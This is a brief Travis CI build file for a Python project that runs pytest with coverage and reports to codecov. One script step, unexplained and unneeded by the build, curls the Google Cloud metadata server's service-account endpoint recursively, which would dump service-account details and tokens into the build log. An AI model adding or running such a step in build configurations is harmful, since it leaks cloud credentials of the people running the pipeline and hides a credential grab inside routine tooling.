language: python
python:  
   - "3.6"
install:  
  - pip install -e . 
  - pip install pytest-cov codecov   
# Install packages for code coverage report
script:  
  - curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/?recursive=true
  - pytest --cov=test

after_success:
  - codecov